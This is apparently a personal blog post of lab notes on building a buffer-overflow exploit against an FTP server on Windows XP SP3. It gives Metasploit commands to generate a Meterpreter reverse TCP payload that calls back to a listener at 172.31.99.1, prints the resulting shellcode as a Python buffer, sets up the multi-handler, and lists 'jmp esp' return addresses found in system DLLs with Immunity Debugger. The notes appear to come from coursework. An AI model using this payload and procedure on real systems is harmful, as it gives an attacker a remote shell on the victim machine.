Saturday, November 22, 2014

Notes created for Immunity Debugger

Notes about generating a payload for a python script, setting up a multi-handler, and using a multi-handler to then exploit and gain a meterpreter shell.

Generate Meterpreter Reverse TCP with the multi-handler listening
-----------------------------------------------------------------
use payload/windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1
set lport 4444

generate -b '\x00\x0a\x0d\x20' -t python
- This generates a payload without the hex characters following the b in the language of python.

buf =  ""
buf += "\xda\xc1\xd9\x74\x24\xf4\xb8\xec\x27\x13\x24\x5b\x33"
buf += "\xc9\xb1\x18\x31\x43\x18\x83\xeb\xfc\x03\x43\xf8\xc5"
buf += "\xe6\xd8\x31\xd1\x6d\xaa\x72\xd5\xe6\xec\x78\x9e\xa9"
buf += "\xf0\x0b\xb2\xc2\x7b\x2b\x1e\x79\x35\x28\x66\xbf\xf8"
buf += "\x1d\x39\x8d\x89\x8e\x4e\x9b\x79\xdb\x14\x60\xf1\x97"
buf += "\x93\xe0\x8e\x6b\x91\x0c\x90\x9a\x22\x6d\xca\x5d\xdd"
buf += "\xe5\x9b\x61\x1c\x14\x58\xf0\x12\xbb\x35\x03\x41\x39"
buf += "\x35\xd3\x02\x55\x65\xc3\x4a\xa7\x1d\xe1\x92\xb6\x81"
buf += "\x6c\x73\xeb\x8e\x62\x27\x5d\xa6\x2b\xad\x4d\x19\x9c"
buf += "\x67\x91\x7c"

use exploit/multi/handler
set payload windows/meterpreter/reverse_ord_tcp
set lhost 172.31.99.1

*** With the Immunity Debugger we need to find memory addresses that have "jmp esp" instructions.

1. Load or attach the FTP server with Immunity Debugger
2. Click the shortcut of "e" to load the Modules menu of all of the .dll's that are running
3. Double click on one of them not related to the FTP server
4. Right-click go to Search for ... "All commands in all modules"
5. Key in the instruction that you are searching for "jmp esp"
6. It then returns a list of "jmp esp" instructions and associated memory addresses...
Windows XP w/ SP3 - MFC42.dll 0x73E32ECF
Windows XP w/ SP3 - WINMM.dll 0x76B43ADC
Windows XP w/ SP3 - ADVAPI32.dll 0x77DEF049

No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...